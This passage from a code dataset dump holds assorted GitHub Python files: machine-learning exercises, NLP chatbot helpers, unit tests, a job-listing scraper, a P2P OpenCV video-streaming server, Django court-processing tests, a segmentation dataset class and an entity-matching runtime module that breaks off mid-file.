KNeighborsClassifier\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import RandomizedSearchCV\nimport numpy as np\n\nweights = ['uniform', 'distance'] \nnumNeighbors = [3, 4, 5]\nparam_grid = dict(weights=weights, n_neighbors=numNeighbors)\n\n\ngrid = RandomizedSearchCV(KNeighborsClassifier(), param_grid, cv=3, n_iter=5)\ngrid.fit(X_train, y_train)\n\ncross_val_score(grid, X_test, y_test, cv=3, scoring=\"accuracy\")\n\n# %%\n# Exercise 2\nfrom scipy.ndimage.interpolation import shift\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import cross_val_score\n\nX_train_augumented = X_train.tolist()\ny_train_augumented = y_train.tolist()\n\nfor i in range(X_train.shape[0]):\n image = X_train[i].reshape(28, 28)\n shift_up = shift(image, [-1, 0],
cval=0).reshape([-1])\n shift_down = shift(image, [1, 0], cval=0).reshape([-1])\n shift_right = shift(image, [0, 1], cval=0).reshape([-1])\n shift_left = shift(image, [0, -1], cval=0).reshape([-1])\n\n X_train_augumented.append(shift_up)\n X_train_augumented.append(shift_down)\n X_train_augumented.append(shift_right)\n X_train_augumented.append(shift_left)\n\n y_train_augumented.append(y_train[i])\n y_train_augumented.append(y_train[i])\n y_train_augumented.append(y_train[i])\n y_train_augumented.append(y_train[i])\n\nX_train_augumented = np.array(X_train_augumented)\ny_train_augumented = np.array(y_train_augumented)\n# shuffle over the full augmented set, not just the first 60000 rows\nshuffle_index = np.random.permutation(len(X_train_augumented))\nX_train_augumented, y_train_augumented = X_train_augumented[shuffle_index], y_train_augumented[shuffle_index]\n\nknn_clf = KNeighborsClassifier()\nknn_clf.fit(X_train_augumented, y_train_augumented)\n\ncross_val_score(knn_clf, X_test, y_test, cv=3, scoring=\"accuracy\")","repo_name":"joaoflf/handson-ml","sub_path":"chapter3.py","file_name":"chapter3.py","file_ext":"py","file_size_in_byte":6435,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"33061050889","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\n\nCOMPARISON_OPERATORS = ('gt', 'gte', 'lt', 'lte', 'in',)\nLOOKUP_SEP = '__'\n\n\ndef convert_lookups(**query):\n \"\"\"\n Transform a query from Django-style format to Datastore format.\n\n :return: An iterable of filters suitable to pass to :meth:`~gcloudoem.datastore.query.Query.add_filter`.\n \"\"\"\n filters = []\n for key, value in sorted(query.items()):\n parts = key.rsplit(LOOKUP_SEP)\n parts = [part for part in parts if not part.isdigit()]\n # Figure out the operator\n op = 'eq'\n if len(parts) > 1 and parts[-1] in COMPARISON_OPERATORS:\n op = parts.pop()\n\n # Convert to datastore notation for key. 
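A minimal standalone sketch of choosing a decision threshold from precision_recall_curve, complementing the threshold plotting in chapter3.py above; the labels and scores here are toy values, not from the original file.

import numpy as np
from sklearn.metrics import precision_recall_curve

# Toy data standing in for y_train_5 / y_scores above.
y_true = np.array([0, 0, 1, 1, 0, 1, 1, 0, 1, 1])
y_score = np.array([0.1, 0.3, 0.35, 0.4, 0.45, 0.5, 0.6, 0.65, 0.7, 0.9])
precisions, recalls, thresholds = precision_recall_curve(y_true, y_score)

# precisions/recalls carry one more entry than thresholds, so drop the last
# point before indexing; argmax returns the first index meeting the target.
target = 0.80
idx = int(np.argmax(precisions[:-1] >= target))
print(thresholds[idx], precisions[idx], recalls[idx])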
Just a nice-to-have.\n if parts[0] == 'pk':\n parts[0] = 'key'\n\n # Save the filter\n filters.append((parts[0], op, value,))\n return filters\n","repo_name":"Kapiche/gcloud-datastore-oem","sub_path":"gcloudoem/queryset/lookups.py","file_name":"lookups.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"10752420963","text":"import nltk\nimport numpy as np\nimport json \n\nfrom nltk.stem.porter import PorterStemmer \n\nnltk.download('punkt')\nstemmer = PorterStemmer()\n\ndef tokenize(sentence):\n return nltk.word_tokenize(sentence.lower())\n\ndef stem(word):\n # reuse the module-level stemmer instead of constructing one per call\n return stemmer.stem(word.lower())\n\n\ndef bag_of_words(tokenized_sentence , all_words):\n tokenized_sentence = [stem(w) for w in tokenized_sentence]\n bag = np.zeros(len(all_words), dtype=np.float32)\n for idx, w in enumerate(all_words):\n if w in tokenized_sentence:\n bag[idx] = 1.0\n return bag\n\ndef dataloader(file):\n\n file_extension = file.split('.')[-1].lower()\n\n if file_extension == 'json':\n with open(file) as f:\n intents = json.load(f)\n else:\n raise Exception('File format not supported')\n\n all_words = []\n tags = []\n\n xy = []\n\n for intent in intents['intents']:\n tag = intent['tag']\n tags.append(tag)\n for pattern in intent['patterns']:\n w = tokenize(pattern)\n all_words.extend(w)\n xy.append((w,tag))\n\n\n ignore_words = ['?','!','.',',']\n all_words = [stem(w) for w in all_words if w not in ignore_words]\n all_words = sorted(set(all_words)) #set is used to remove duplicates\n tags = sorted(set(tags))\n\n\n X_train = []\n y_train = []\n\n for (pattern_sentence,tag) in xy:\n bag = bag_of_words(pattern_sentence,all_words)\n X_train.append(bag)\n\n label = tags.index(tag)\n y_train.append(label)\n\n X_train = np.array(X_train)\n y_train = np.array(y_train)\n\n return X_train,y_train,all_words,tags","repo_name":"varadtechx/boctor","sub_path":"boctor/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"1675796064","text":"import os\nimport logging\nimport unittest\nimport pathlib\nfrom pathlib import Path\nfrom unittest.mock import patch, MagicMock\n\nimport stitch_m\nfrom stitch_m.file_handler import create_user_config, create_Windows_shortcut, _create_lnk_file, _get_desktop_path\n\nclass TestSetupFunctions(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n # Set maximum difference string length to None (infinite)\n cls.maxDiff = None\n\n # ------------------\n # Test config setup:\n \n def test_setup_config(self):\n with patch('shutil.copyfile', MagicMock()) as mocked_copyfile:\n local_config_file = Path(stitch_m.__file__).resolve().with_name(\"config.cfg\")\n user_config_location = Path(stitch_m.__file__).parent / \"test_config_path\"\n with patch('stitch_m.file_handler.get_user_config_path', MagicMock(return_value=(user_config_location, []))):\n create_user_config()\n mocked_copyfile.assert_called_once_with(local_config_file, user_config_location)\n\n @patch('stitch_m.file_handler.get_user_config_path')\n @patch('logging.error')\n def test_setup_config_fail_bad_path(self, mocked_error_log, mocked_get_config):\n mocked_get_config.return_value = (Path(os.path.expanduser(\"~/.fake_dir/oh_no/thisisbad.cfg\")), [])\n create_user_config()\n mocked_error_log.assert_called_once_with(\"Unable to create user config file due to directory issues\", exc_info=True)\n\n # 
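A minimal usage sketch for the tokenize/stem/bag_of_words helpers in boctor/utils.py above; it assumes those functions are in scope and that nltk's 'punkt' data has been downloaded (the module does this at import time).

tokens = tokenize("How long does shipping take?")
vocab = ["how", "long", "ship", "take", "thank"]  # an already-stemmed vocabulary
print(bag_of_words(tokens, vocab))                # -> [1. 1. 1. 1. 0.]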
------------------\n # Test Windows shortcut setup:\n\n @patch(\"os.name\")\n @patch('logging.error')\n def test_setup_win_exits_on_linux(self, mocked_error_log, mocked_os_name):\n mocked_os_name.return_value = \"posix\"\n create_Windows_shortcut()\n mocked_error_log.assert_called_once_with(\"This command is only valid on Windows installations.\")\n\n @patch.object(pathlib.Path, \"exists\", MagicMock(return_value=False))\n @patch('logging.error')\n def test_setup_windows_shortcut_function_called(self, mocked_error):\n with patch('stitch_m.file_handler._create_lnk_file', MagicMock()) as mocked_shortcut_creator:\n create_Windows_shortcut()\n if os.name == \"nt\":\n home_dir = Path(os.environ[\"HOMEDRIVE\"]) / os.environ[\"HOMEPATH\"]\n try:\n desktop = _get_desktop_path()\n self.assertTrue(desktop.relative_to(home_dir), \"Invalid desktop found\")\n except Exception:\n logging.warning(\"_get_desktop_path failed\")\n desktop = home_dir / \"Desktop\"\n\n self.assertTrue(desktop.is_dir(), \"Invalid desktop found\")\n mocked_shortcut_creator.assert_called_once_with(desktop / \"StitchM.lnk\")\n else:\n mocked_error.assert_called_once_with(\"This command is only valid on Windows installations.\")\n\n @unittest.skipUnless(os.name == \"nt\", \"Only run on Windows\")\n def test_setup_windows_shortcut_test_created_(self):\n # Only run this test if on Windows\n test_shortcut_path = Path(\".\") / \"test_shortcut.lnk\"\n _create_lnk_file(test_shortcut_path)\n link_created = test_shortcut_path.exists()\n if link_created:\n os.remove(test_shortcut_path)\n self.assertTrue(link_created)\n ","repo_name":"DiamondLightSource/StitchM","sub_path":"src/tests/test_setup_commands.py","file_name":"test_setup_commands.py","file_ext":"py","file_size_in_byte":3295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"19500569903","text":"from typing import Any\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\nfrom bs4.element import ResultSet, Tag\n\n\nclass JobSoup(BeautifulSoup):\n def __init__(self, source):\n self.job_cards = self._get_job_list(source)\n self.job_dict_list = self._create_job_dict()\n\n def _get_job_list(self, source: str) -> ResultSet[Any]:\n # Extracting all the job cards from our source\n job_screen_soup = BeautifulSoup(source, \"html.parser\")\n job_cards = job_screen_soup.find_all(\n \"div\", {\"class\": \"card card-custom\"}\n )\n return job_cards\n\n def _create_job_dict(self) -> list[dict[str, str]]:\n job_dict_list: list[dict[str, Any]] = list()\n\n # The following functions just get the relevant info\n def get_title(card: Tag) -> tuple[str, str]:\n container = card.findChildren(\"h3\")[0]\n anchor = container.findChildren(\"a\")[0]\n title = anchor.getText().replace(\"\\n\", \"\")\n link = anchor.get(\"href\").replace(\"\\n\", \"\")\n return title.strip(), link.strip()\n\n def get_label(card: Tag, text: str) -> str:\n label_tag = card.findChildren(\"label\", text=text)[0]\n rate = label_tag.findNext(\"div\")\n return rate.getText().replace(\"\\n\", \"\").strip()\n\n def get_synopsis(card, element_class) -> str:\n container = card.findChildren(\"div\", {\"class\": element_class})[0]\n synopsis_tag = container.findChildren(\"p\")[0]\n return synopsis_tag.getText().replace(\"\\n\", \"\").strip()\n\n # Populates our job list\n for card in self.job_cards:\n title, link = get_title(card)\n job_dict = {\n \"title\": title,\n \"link\": link,\n \"rate\": get_label(card, \"Pay Rate:\"),\n \"created_at\": 
datetime.strptime(\n get_label(card, \"Date Created:\"), \"%d/%m/%Y\"\n ),\n \"synopsis\": get_synopsis(\n card, \"detail-long-item px-2 render-md\"\n ),\n }\n\n job_dict_list.append(job_dict)\n\n return job_dict_list\n","repo_name":"kamalsacranie/athena-tutor-bot","sub_path":"athena/job_list.py","file_name":"job_list.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"6571480395","text":"class Solution(object):\n def findTargetSumWays(self, nums, S):\n \"\"\"\n :type nums: List[int]\n :type S: int\n :rtype: int\n \"\"\"\n def put(newSum, memo, ways):\n if newSum not in memo:\n memo[newSum] = ways\n else:\n memo[newSum] += ways\n \n if nums is None or len(nums) == 0:\n return 1 if S == 0 else 0\n memo = {0:1}\n for ni in nums:\n newMemo = dict()\n for mi in memo:\n ways = memo[mi]\n newSum = mi + ni\n put(newSum, newMemo, ways)\n newSum = mi - ni\n put(newSum, newMemo, ways)\n memo = newMemo\n return memo[S] if S in memo else 0\n","repo_name":"patrick-luo/Leet-Code","sub_path":"494. Target Sum.py","file_name":"494. Target Sum.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"38146503965","text":"from threading import Thread\nimport socket, urllib.request, sys, cv2\nimport numpy as np\n\n\nclass P2PServer(Thread):\n def __init__(self, filename, maingui=None, port=2842, address=None, numpeers=1, debug=False):\n Thread.__init__(self)\n self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.filename = filename\n if address is None:\n self.ext_ip = urllib.request.urlopen('https://ident.me').read().decode('utf8')\n else:\n self.ext_ip = address\n self.debug = debug\n self.port = port\n if self.debug:\n self.printdebuginfo()\n self.server_socket.bind((self.ext_ip, self.port))\n self.server_socket.listen(5)\n self.connections = 0\n self.peers = []\n self.gui = maingui\n if numpeers < 1:\n numpeers = 1\n self.numpeers = numpeers\n self.connection_handler = _Loop(self, self.server_socket)\n self.connection_handler.start()\n\n def run(self):\n cap = cv2.VideoCapture(self.filename)\n buffer = []\n end = False\n running = True\n first = True\n h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n h = h.to_bytes(4, sys.byteorder)\n w = w.to_bytes(4, sys.byteorder)\n while running:\n ret, frame = cap.read()\n if frame is not None:\n data = frame.flatten()\n message = data.tostring()\n size = len(message)\n if self.debug:\n print('Initial Size: ' + str(size))\n size = size.to_bytes(4, sys.byteorder)\n if self.debug:\n print(size)\n message = size + b'' + message\n if first:\n message = h + b'' + w + b'' + message\n first = False\n if self.debug:\n print('Total Size: ' + str(len(message)))\n buffer.append(message)\n else:\n end = True\n for peer in self.peers:\n if not end:\n try:\n peer.senddata(message)\n except BrokenPipeError:\n if self.debug:\n print('The client disconnected')\n peer.discnct()\n else:\n peer.senddisconnect()\n else:\n try:\n buffer.pop(0)\n except IndexError:\n if self.debug:\n print('Sent All data')\n running = False\n\n def askdata(self):\n if self.debug:\n inpt = input('Insert the message:\\n')\n length = len(inpt)\n byteslength = length.to_bytes(4, sys.byteorder)\n print(f'Length: {length}')\n text = byteslength + bytes(inpt, 'utf-8')\n return text\n\n def printdebuginfo(self):\n print(f''' -- P2P Server started --\nIP: 
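A quick illustrative check of the findTargetSumWays counting above (it assumes the Solution class from the snippet is in scope): nums = [1, 1, 1, 1, 1] with S = 3 admits exactly five sign assignments, e.g. -1+1+1+1+1.

# Each pass folds one number into the map of reachable sums -> way counts:
# after [1], memo = {1: 1, -1: 1}; after [1, 1], memo = {2: 1, 0: 2, -2: 1}; ...
print(Solution().findTargetSumWays([1, 1, 1, 1, 1], 3))  # expected: 5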
{self.ext_ip}\nport: {self.port}''')\n\n def stopConnection(self):\n self.server_socket.close()\n\n\nclass _Loop(Thread):\n def __init__(self, server, server_socket, running=True):\n Thread.__init__(self)\n self.server = server\n self.server_socket = server_socket\n self.running = running\n self.first = True\n\n def run(self):\n while True:\n if self.running:\n client_socket, address = self.server_socket.accept()\n self.server.connections += 1\n self.running = self.server.connections < self.server.numpeers\n peer = _P2PConnection(self.server, client_socket, address)\n self.server.peers.append(peer)\n if self.server.connections > 0 and self.first:\n self.first = False\n self.server.start()\n\n\nclass _P2PConnection:\n def __init__(self, server, sock, address):\n self.server = server\n self.sock = sock\n self.address = address\n\n def senddata(self, bytes):\n bytessent = 0\n msglen = len(bytes)\n while bytessent < msglen:\n sent = self.sock.send(bytes[bytessent:])\n if sent == 0:\n self.server.peers.remove(self)\n bytessent += sent\n\n def senddisconnect(self):\n msg = b''\n self.sock.send(msg)\n self.server.peers.remove(self)\n self.sock.close()\n\n def discnct(self):\n self.sock.close()\n self.server.peers.remove(self)\n\ndef main():\n debug = P2PServer(debug=True)\n debug.start()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"John-Bonazzi/CIS457","sub_path":"Semester_project/P2P_Streaming/P2PServer.py","file_name":"P2PServer.py","file_ext":"py","file_size_in_byte":4711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17094590817","text":"from django.core.management import call_command\nfrom django.test import tag, TestCase\n\nfrom oldp.apps.courts.apps import CourtLocationLevel, CourtTypes\nfrom oldp.apps.courts.models import Court\nfrom oldp.apps.courts.processing.processing_steps.enrich_from_wikipedia import ProcessingStep as EnrichFromWikipedia\nfrom oldp.apps.courts.processing.processing_steps.set_aliases import ProcessingStep as SetAliases\nfrom oldp.utils.test_utils import web_test\n\n\n@tag('processing')\nclass CourtsProcessingTestCase(TestCase):\n fixtures = [\n 'locations/countries.json', 'locations/states.json', 'locations/cities.json',\n 'courts/courts.json',\n ]\n\n def setUp(self):\n pass\n\n def tearDown(self):\n pass\n\n\n @web_test\n def test_enrich_courts_cmd(self):\n opts = {\n 'start': 0,\n 'limit': 3\n }\n call_command('process_courts', *['enrich_from_wikipedia'], **opts)\n\n res = Court.objects.exclude(image__isnull=True).exclude(image__exact='').exclude(description__exact='')\n\n self.assertEqual(len(res), 2, 'There should be 2 enriched courts')\n\n # for r in res:\n # print(r.__dict__)\n\n @web_test\n def test_enrich_court(self):\n step = EnrichFromWikipedia()\n\n court = Court.objects.get(slug='bverfg')\n res = step.process(court)\n\n self.assertEqual(res.image.width, 180, 'Invalid image width')\n self.assertEqual(res.image.height, 249, 'Invalid image height')\n self.assertTrue(res.description.startswith('Das Bundesverfassungsgericht (BVerfG) ist in der Bundesrepublik '\n 'Deutschland das Verfassungsgericht des Bundes.'),\n 'Invalid description')\n\n # Test depends on German court types\n def test_set_aliases(self):\n class TestCourtTypes(CourtTypes):\n def get_types(self):\n return {\n 'AG': {\n 'name': 'Amtsgericht',\n 'levels': [CourtLocationLevel.CITY]\n }\n }\n\n with self.settings(COURT_TYPES=TestCourtTypes()):\n\n step = SetAliases()\n\n # Frankfurt am Main\n 
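The P2PServer above frames its stream with native-byte-order 4-byte length prefixes, and the first message additionally carries 4-byte height and width values, so a receiving peer could be sketched as below. This client is an illustration under those assumptions, not part of the original repository.

import socket
import sys

import numpy as np

def recv_exact(sock, n):
    # recv() may return short reads, so loop until exactly n bytes arrive.
    buf = b''
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError('peer closed the stream')
        buf += chunk
    return buf

def read_frames(host, port):
    sock = socket.create_connection((host, port))
    h = int.from_bytes(recv_exact(sock, 4), sys.byteorder)
    w = int.from_bytes(recv_exact(sock, 4), sys.byteorder)
    try:
        while True:
            size = int.from_bytes(recv_exact(sock, 4), sys.byteorder)
            frame = np.frombuffer(recv_exact(sock, size), dtype=np.uint8)
            yield frame.reshape(h, w, 3)   # cv2 frames are uint8 BGR, h*w*3 bytes
    except ConnectionError:
        sock.close()  # the server closes the socket after the last frame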
step.process(Court.objects.get(pk=2001)).save()\n\n self.assertEqual(2001, Court.objects.get(aliases__contains='AG Frankfurt (Main)').pk)\n\n # for court in Court.objects.filter(pk__gte=1000):\n # res = step.process(court)\n","repo_name":"openlegaldata/oldp","sub_path":"oldp/apps/courts/tests/test_processing.py","file_name":"test_processing.py","file_ext":"py","file_size_in_byte":2488,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"53"} +{"seq_id":"1612745158","text":"import os\nfrom torchvision import transforms\nfrom torchvision.datasets import VisionDataset\nimport torchvision.transforms.functional as F\nimport random\nfrom PIL import Image\n\n# Die Class wurde zusammen mit ChatGPT erstellt.\nclass SegmentationDataset(VisionDataset):\n def __init__(self, root, split='train', transform_mode='to_tensor'):\n super(SegmentationDataset, self).__init__(root)\n \n assert split in ['train', 'test', 'validation', 'cropped']\n self.split = split\n self.transform_mode = transform_mode\n \n # Ordnerpfade für Bilder und Masken\n self.images_dir = os.path.join(root, split, 'images')\n self.masks_dir = os.path.join(root, split, 'masks')\n \n # Liste der Dateinamen\n self.images = sorted(os.listdir(self.images_dir))\n self.masks = sorted(os.listdir(self.masks_dir))\n \n assert len(self.images) == len(self.masks)\n\n def transform_to_tensor(self, image, mask):\n to_tensor = transforms.ToTensor()\n image = to_tensor(image)\n mask = to_tensor(mask)\n return image, mask\n\n def transform_normalize(self, image, mask):\n to_tensor = transforms.ToTensor()\n normalize = transforms.Normalize(mean=[0,0,0], std=[1,1,1])\n image = normalize(to_tensor(image))\n mask = to_tensor(mask)\n return image, mask\n\n def transform_flip(self, image, mask):\n to_tensor = transforms.ToTensor()\n normalize = transforms.Normalize(mean=[0,0,0], std=[1,1,1])\n\n if random.random() > 0.5:\n image = F.hflip(image)\n mask = F.hflip(mask)\n\n image = normalize(to_tensor(image))\n mask = to_tensor(mask)\n return image, mask\n \n def transform_color_jitter(self, image, mask):\n color_jitter = transforms.ColorJitter(brightness=0.2, contrast=0.2, saturation=0.2, hue=0.1)\n image = color_jitter(image)\n\n to_tensor = transforms.ToTensor()\n normalize = transforms.Normalize(mean=[0,0,0], std=[1,1,1])\n\n image = normalize(to_tensor(image))\n mask = to_tensor(mask)\n\n return image, mask\n\n\n def __getitem__(self, index):\n # Lade das Bild und die entsprechende Maske\n img_path = os.path.join(self.images_dir, self.images[index])\n mask_path = os.path.join(self.masks_dir, self.masks[index])\n \n img = Image.open(img_path).convert(\"RGB\")\n mask = Image.open(mask_path).convert(\"1\")\n \n if self.transform_mode == 'to_tensor':\n img, mask = self.transform_to_tensor(img, mask)\n elif self.transform_mode == 'normalize':\n img, mask = self.transform_normalize(img, mask)\n elif self.transform_mode == 'flip':\n img, mask = self.transform_flip(img, mask)\n elif self.transform_mode == 'color_jitter':\n img, mask = self.transform_color_jitter(img, mask)\n return img, mask\n\n def __len__(self):\n return len(self.images)\n","repo_name":"patschue/Semantic-Segmentation-Landslides","sub_path":"helpers/generate_dataclass.py","file_name":"generate_dataclass.py","file_ext":"py","file_size_in_byte":3011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39728441850","text":"#!/usr/bin/env python3\n#\n# euler235.py / An Arithmetic Geometric 
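An illustrative way to consume the SegmentationDataset above with a PyTorch DataLoader; the root path and batch size are placeholders, and batching assumes all image/mask pairs share one size.

from torch.utils.data import DataLoader

train_ds = SegmentationDataset('data/landslides', split='train', transform_mode='flip')
train_loader = DataLoader(train_ds, batch_size=8, shuffle=True)

images, masks = next(iter(train_loader))
# images: float tensor of shape [8, 3, H, W]; masks: binary tensor of shape [8, 1, H, W]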
sequence\nimport time\nfrom tqdm import tqdm\n\n# Start the execution timer\nstart_time = time.time()\n\ndef u(k,r):\n return (900-3*k)*r**(k-1)\n\ndef s(n,r):\n mysum = 0\n for k in range(1,n+1):\n mysum += u(k,r)\n return mysum\n\ndef find_lower_r():\n sum_to_find = -600000000000\n r = 1.002322\n while (True):\n if s(5000, r) <= sum_to_find:\n print(r)\n print(s(5000,r))\n break\n r += 0.000000000001\n\n# main loop\nsum_to_find = -600000000000\n#find_lower_r()\nprint(s(5000, 1.002322))\nprint(s(5000, 1.002323))\nprint(s(5000, 1.002322108633))\n\n\n# Display the execution time\nprint(\"Execution time: %s seconds ---\" % (time.time() - start_time))\n\n","repo_name":"allagonne/Euler_project","sub_path":"euler235.py","file_name":"euler235.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"7808735132","text":"import os\r\nimport re\r\nimport nltk\r\nimport math\r\nimport torch\r\nimport string\r\nimport datetime\r\nimport time\r\nimport pickle\r\nfrom copy import deepcopy\r\nfrom scipy import stats\r\nimport csv\r\nimport sys\r\nimport _thread\r\nfrom threading import Lock, Thread, Timer\r\nimport ctypes\r\nimport inspect\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom scipy.stats import t\r\nfrom enum import Flag, auto\r\nfrom numba import jit, njit, prange\r\nfrom nltk.cluster import KMeansClusterer\r\nfrom gensim.models import fasttext\r\nfrom fuzzywuzzy import fuzz\r\nimport traceback\r\nimport collections\r\nfrom paretoset import paretoset\r\nfrom multiprocessing import cpu_count\r\nimport itertools\r\nimport functools\r\nfrom scipy.special import logit, expit\r\nimport spacy\r\n# from line_profiler import LineProfiler\r\n\r\nfrom source import metainfo\r\n\r\nclass runtime:\r\n\r\n class regularpattern:\r\n\r\n nlp = spacy.load('en_core_web_lg')\r\n\r\n class matchway(Flag):\r\n startwith = auto()\r\n contain = auto()\r\n exact = auto()\r\n ner = auto()\r\n idf = auto()\r\n groups = auto()\r\n\r\n notunicodepattern = u\"([^\\u4e00-\\u9fa5\\u0030-\\u0039\\u0041-\\u005a\\u0061-\\u007a])\"\r\n notunicodepattern_ex = u\"([^\\u4e00-\\u9fa5\\u0030-\\u0039\\u0041-\\u005a\\u0061-\\u007a.*x%])\"\r\n\r\n numberpattern = r'[+-]?([0-9]?[.])?[0-9]+'\r\n modelpattern = '^(([a-zA-Z]+[0-9-]+)|([0-9]+[a-zA-Z-]+))[a-zA-Z0-9-]*$'\r\n operatorpattern = r'[+-]?([+-]?([0-9]?[.])?[0-9]+[.*x%]{1})*([0-9]?[.])?[0-9]+'\r\n grouppatterns = [\r\n [None, matchway.idf, lambda x: runtime.regularpattern.grouppatterns_idf_para != None and len(x) >= 5 and runtime.regularpattern.grouppatterns_idf_para[x] == 1], \\\r\n [None, matchway.idf, lambda x: runtime.regularpattern.grouppatterns_idf_para != None and len(x) >= 5 and runtime.regularpattern.grouppatterns_idf_para[x] == 2], \\\r\n ]\r\n grouppatterns_cooccur_veto = [0, 1]\r\n grouppatterns_cooccur_veto_ground = {0:1}\r\n for eachgroupindex in range(0, len(grouppatterns_cooccur_veto)):\r\n grouppatterns_cooccur_veto[eachgroupindex] = 'w2group_' + str(grouppatterns_cooccur_veto[eachgroupindex])\r\n for eachgroup in dict(grouppatterns_cooccur_veto_ground):\r\n grouppatterns_cooccur_veto_ground['w2group_' + str(eachgroup)] = 'w2group_' + str(grouppatterns_cooccur_veto_ground[eachgroup])\r\n del grouppatterns_cooccur_veto_ground[eachgroup]\r\n grouppatterns_model_para = set(['DATE', 'QUANTITY', 'TIME', 'PERCENT', 'MONEY', 'CARDINAL'])\r\n grouppatterns_idf_para = None\r\n keytoken_extract = [\r\n 
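Since s(5000, r) in euler235.py above decreases monotonically in r over the range of interest, the 1e-12 linear scan in find_lower_r could be replaced by bisection; a sketch reusing the s() defined above (the bounds and iteration count are illustrative choices, not from the original file):

def bisect_r(target=-600000000000, lo=1.0, hi=1.01, iters=60):
    # Invariant: s(5000, lo) > target >= s(5000, hi).
    for _ in range(iters):
        mid = (lo + hi) / 2
        if s(5000, mid) > target:
            lo = mid
        else:
            hi = mid
    return hi

# print(bisect_r())  # converges near r = 1.002322108633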
[['NORP', 'GPE', 'LOC', 'PERSON', 'PRODUCT'], matchway.ner], \\\r\n [['DATE', 'QUANTITY', 'TIME', 'PERCENT', 'MONEY', 'CARDINAL'], matchway.ner], \\\r\n [modelpattern, matchway.exact, lambda x: len(x) >= 8 and len(set([r.label_ for r in runtime.regularpattern.nlp(x, disable=['tagger', 'parser']).ents]).intersection(runtime.regularpattern.grouppatterns_model_para)) == 0], \\\r\n [modelpattern, matchway.exact, lambda x: len(x) >= 6 and len(set([r.label_ for r in runtime.regularpattern.nlp(x, disable=['tagger', 'parser']).ents]).intersection(runtime.regularpattern.grouppatterns_model_para)) == 0]\r\n ]\r\n\r\n @staticmethod\r\n def index(varname):\r\n if type(varname) == str:\r\n varname = varname.split(',')\r\n thepattern = eval('runtime.regularpattern.' + varname[0])\r\n thematchway = eval('runtime.regularpattern.matchway.' + varname[1])\r\n return thepattern, thematchway\r\n else:\r\n return None\r\n\r\n @staticmethod\r\n def ispattern(string, pattern, matchway, bool = False):\r\n if type(string) != str:\r\n return False\r\n result = False\r\n if matchway == runtime.regularpattern.matchway.groups:\r\n for eachgroupindex in range(0, len(pattern)):\r\n currentresult = runtime.regularpattern.ispattern(string, pattern[eachgroupindex][0], pattern[eachgroupindex][1], bool)\r\n if currentresult != False and \\\r\n (len(pattern[eachgroupindex]) <= 2 or \\\r\n len(pattern[eachgroupindex]) >= 3 and pattern[eachgroupindex][2](string) == True):\r\n result = str(eachgroupindex)\r\n break\r\n elif matchway == runtime.regularpattern.matchway.ner:\r\n ners = runtime.regularpattern.nlp(string, disable=['tagger', 'parser'])\r\n ents = ners.ents\r\n if len(ents) == 0:\r\n return False\r\n else:\r\n assert(len(ents) == 1)\r\n for ent in ents:\r\n start, end, label = ent.start, ent.end, ent.label_\r\n if label in pattern:\r\n return True\r\n else:\r\n return False\r\n elif matchway == runtime.regularpattern.matchway.idf:\r\n return True\r\n else:\r\n if matchway == runtime.regularpattern.matchway.contain:\r\n contains = re.findall(pattern, string)\r\n if len(contains) > 0:\r\n result = contains\r\n else:\r\n result = False\r\n elif matchway == runtime.regularpattern.matchway.exact:\r\n if pattern[0] != '^':\r\n pattern = '^' + pattern\r\n if pattern[-1] != '$':\r\n pattern = pattern + '$'\r\n thestring = re.search(pattern, string)\r\n if thestring != None and thestring.string == string:\r\n result = True\r\n else:\r\n result = False\r\n elif matchway == runtime.regularpattern.matchway.startwith:\r\n if pattern[0] != '^':\r\n pattern = '^' + pattern\r\n if pattern[-1] == '$':\r\n pattern = pattern[0:len(pattern) - 1]\r\n pattern = re.compile(pattern)\r\n startwith = pattern.match(string)\r\n if startwith:\r\n result = startwith.group()\r\n else:\r\n result = False\r\n if bool == True:\r\n return result != False\r\n else:\r\n return result\r\n\r\n class deepmatcherlinkage:\r\n\r\n @staticmethod\r\n def combine(table1filename, table2filename, pairsfilename, dmpairsfilename):\r\n csvpairsfile = open(pairsfilename, \"r\", encoding='ISO-8859-1')\r\n readerpairs = csv.reader(csvpairsfile)\r\n hpairs = next(readerpairs)\r\n csvtable1file = open(table1filename, \"r\", encoding='ISO-8859-1')\r\n readertable1 = csv.reader(csvtable1file)\r\n htable1 = next(readertable1)\r\n csvtable2file = open(table2filename, \"r\", encoding='ISO-8859-1')\r\n readertable2 = csv.reader(csvtable2file)\r\n htable2 = next(readertable2)\r\n leng = len(htable1) - 1\r\n for i in range(leng):\r\n htable1[i + 1] = 'left_' + htable1[i + 1]\r\n 
